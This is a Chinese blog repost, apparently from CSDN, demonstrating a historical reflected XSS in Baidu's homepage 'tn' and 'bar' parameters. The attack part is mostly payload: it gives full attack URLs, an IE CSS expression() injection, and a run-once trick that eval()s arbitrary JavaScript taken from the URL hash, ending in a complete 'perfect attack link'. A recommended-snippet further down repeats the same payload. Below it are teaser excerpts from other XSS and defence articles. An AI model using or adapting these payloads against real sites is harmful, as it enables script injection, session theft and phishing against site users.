一个典型的参数型跨站脚本漏洞

最新推荐文章于 2023-05-25 10:52:24 发布
最新推荐文章于 2023-05-25 10:52:24 发布
阅读量151 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/itchong/p/abcd9.html
版权

拿百度主页曾经的一个XSS做个演示,这个漏洞是由于百度主页tn和bar参数过滤不严导致的参数型XSS:

http://www.baidu.com/index.php?tn="/**/style=xss:expression(alert(‘xss‘));  
http://www.baidu.com/index.php?bar="/**/style=xss:expression(alert(‘xss‘));  

tn和bar两个参数对应在页面的输出是两个input表单值,可以使用”(双引号)闭合表单值,加入CSS属性跨站,页面具体输出如下:

<input type=hidden name=tn value=""/**/style=xss:expression(alert(‘xss‘));">  


这个漏洞只能在IE下使用,FIREFOX会把URL链接参数中的”(双引号)转成编码%22,页面参数的输出也会变成%22,就不能闭合”(双引号)跨站。expression()是个不听话的角色,这里可以用一个小技巧来去掉expression烦人的死循环。运行当前URL的#注释符后的代码:  

eval(unescape(location.hash.substr(1)))  

给window对象的方法定义一个值,判断这个值运行一次代码:  

(window.r!=1)?eval(‘window.r=1;eval(unescape(location.hash.substr(1)))‘):1  

最后得到完美的攻击链接:  

http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval(‘window.r=1;eval(unescape(location.hash.substr(1)))‘):1);#alert%28%29  

转载于:https://www.cnblogs.com/itchong/p/abcd9.html

weixin_30653023
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
跨站脚本(XSS)攻击
extremecold
08-12 1万+
什么是XSS 全称:Cross Site Script(跨站脚本) 为了与层叠样式表css区分,将跨站脚本简写为XSS 危害:盗取用户信息、钓鱼、制造蠕虫等。 概念:黑客通过“HTML注入”篡改网页,插入了恶意脚本,当用户在浏览网页时,实现控制用户浏览器行为的一种攻击方式。 XSS分类 存储 反射 DOM...
跨站脚本漏洞
weixin_46729085的博客
09-08 3908
XSS漏洞 一、文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞。 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS漏洞? XSS漏洞有哪些分类? 如何防范XSS漏洞? 二:三大分类 反射XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。 存储XSS:&...
跨站脚本攻击漏洞(XSS):基础知识和防御策略
weixin_43263566的博客
01-16 1万+
跨站脚本攻击漏洞-基础篇
URL跨站漏洞
超哥Blog
10-31 614
     最近工作中遇到一个URL跨站漏洞,从网上一查,得知是XSS中的一种,这是局方通过购买的安全测试软件测出来,只给我们发了一个测试结查报告,刚开始单从这个报告的解决方法中得不到具体的解决信息,也只是一般的解决信息,这些都可以从网上找到,如要了解XSS漏洞,可从google中了解,如下说说我的解决方法:      从网上搜了一把,发现解决方法和现有系统中的不太好改,要改前端的话,URL地址多...
User Agent跨站攻击
weixin_33920401的博客
12-31 529
看见有人发帖咨询这个问题http://zone.wooyun.org/content/17658我就抛砖引玉下,这个案例就是refer被执行了,我有过多起案例平时上网我们还可以修改浏览器user-agent和访问任意网都带上你指定的refer长期如此上网你会有意外的收获,我的浏览器user-agent一直是一段xss代码除了统计网,某些网也会收集这些信息,特别是手机app,手机号,...
模块传参数的教训
weixin_33827731的博客
07-05 879
摘要: 今天遇到一个比较奇怪的crash问题,这里记录下。这个crash是由QA设置了一些不合理的参数引起的,还好QA当时保存了Dump文件,让我们可以慢慢分析,从而找出代码中隐藏的问题。阅读全文Richard Wei 2012-07-13 21:27 发表评论 转载于:https://www.cnblogs.com/weiym/archive/2012/07/13/2653021....
识别跨站脚本漏洞
最新发布
m0_64845603的博客
05-25 368
识别跨站脚本(XSS)漏洞测试
XSS跨站脚本攻击漏洞修复方法
06-18
**XSS跨站脚本攻击漏洞修复方法** XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全威胁,它允许攻击者在用户的浏览器上执行恶意代码,从而窃取用户敏感信息、操纵用户行为或者对网进行破坏。本文将...
Dedecms存在储存跨站脚本漏洞1
08-03
标题提及的"Dedecms存在储存跨站脚本漏洞1"主要涉及到的是Dedecms网管理系统的一个安全问题,具体来说,这是一个由于程序代码过滤不足导致的存储跨站脚本( Stored Cross-Site Scripting, XSS )漏洞。...
跨站脚本漏洞(XSS)示例
04-15
例如,"测试Web应用程序是否存在跨站脚本漏洞(XSS).doc"可能就是一个文档,里面详细介绍了如何进行XSS漏洞扫描和测试步骤。通常,这包括对输入字段进行各种注入尝试,检查是否能成功触发恶意脚本的执行。 防止XSS...
java反射行跨站脚本攻击_跨站脚本攻击之反射XSS漏洞【转载】
weixin_34734156的博客
02-24 982
如果一个WEB应用程序使用动态页面传递参数向用户显示错误信息,就有可能会造成一种常见的XSS漏洞。一般情况下,这种页面使用一个包含消息文本的参数,并在页面加载时将文本返回给用户。对于开发者来说,使用这种方法非常方便,因为这样的解决方法可方便的将多种不同的消息返回状态,使用一个定制好的信息提示页面。例如,通过程序参数输出传递的参数到HTML页面,则打开下面的网址将会返回一个消息提示:http://f...
百度最新跨站漏洞
weixin_30902675的博客
07-10 107
http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#alert%28%27www.safe3.cn%27%29 测试地址:运行 转载于:https://www.cnblo...
安全漏洞问题3:跨站脚本
weixin_34283445的博客
11-21 356
安全漏洞问题3:跨站脚本1.1. 漏洞描述跨站脚本攻击(也称为XSS)指利用网漏洞从用户端恶意盗取信息。用户在浏览网、使用即时通讯软件、甚至在阅读电子邮件时,通常会点击其中的链接,攻击者通过在链接中插入恶意代码,系统在接收到包含恶意代码的请求之后会产成一个包含恶意代码的页面,而这个页面看起来和系统应当生成的合法页面一样,当用户浏览器显示该页面内容时即...
WEB漏洞篇——跨站脚本攻击(XSS)
m0_56634355的博客
06-05 4706
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
Web安全-JQuery框架XSS漏洞浅析
热门推荐
道阻且长,行则将至。
01-23 1万+
文章目录框架简介漏洞简述漏洞检测漏洞复现漏洞分析漏洞复现修复建议新版漏洞漏洞复现漏洞原理修复方案漏洞验证 框架简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装 JavaScript 常用的功能代码,提供一种简便的 JavaScript 设计模式,优化 HTML 文档操作、事件处理、动画设计和 Ajax 交互。 据一项调查报告,在对 433000 个网的分析中发现,77%的网至少使用了一个
jQuery框架漏洞全总结及开发建议
iokla
10-02 1万+
一、jQuery简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。 据一项调查报告,在对433,000个网的分析中发现,77%的网至少使用了一个具有已知安全漏洞的前端JavaScript库,而jQuery位列榜首,而且远远超过其他库。但事实上这些库有可用的不
xss总结
weixin_56023251的博客
07-28 431
xss允许恶意web用户将代码植入到提供给其他用户使用的页面中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害用户可能采用cookie资料窃取,会话劫持,钓鱼等攻击手段。反射xss也叫非持久性,参数xss,主要是将恶意的脚本附加到url地址的参数中。xss代码并不需要服务器解析响应的直接参与,触发xss靠的是浏览器端的dom解析。严格来说domxss应该归属到反射xss,它是基于文档对象模的一种xss。domxss与其它两种xss区别在于。可能触发domxss的属性。...
jQuery跨站脚本漏洞
weixin_50464560的博客
08-21 2246
原理:     jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞 影响版本:     jquery-1.7.1~1.8.3    jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min...
XSS跨站脚本攻击详解与防御策略
XSS(Cross-Site Scripting)跨站脚本攻击是Web安全领域的一个重要问题,它利用网的信任机制,将恶意脚本注入到网页中,当其他用户访问这些页面时,恶意脚本会在用户的浏览器中执行,从而可能导致数据窃取、用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值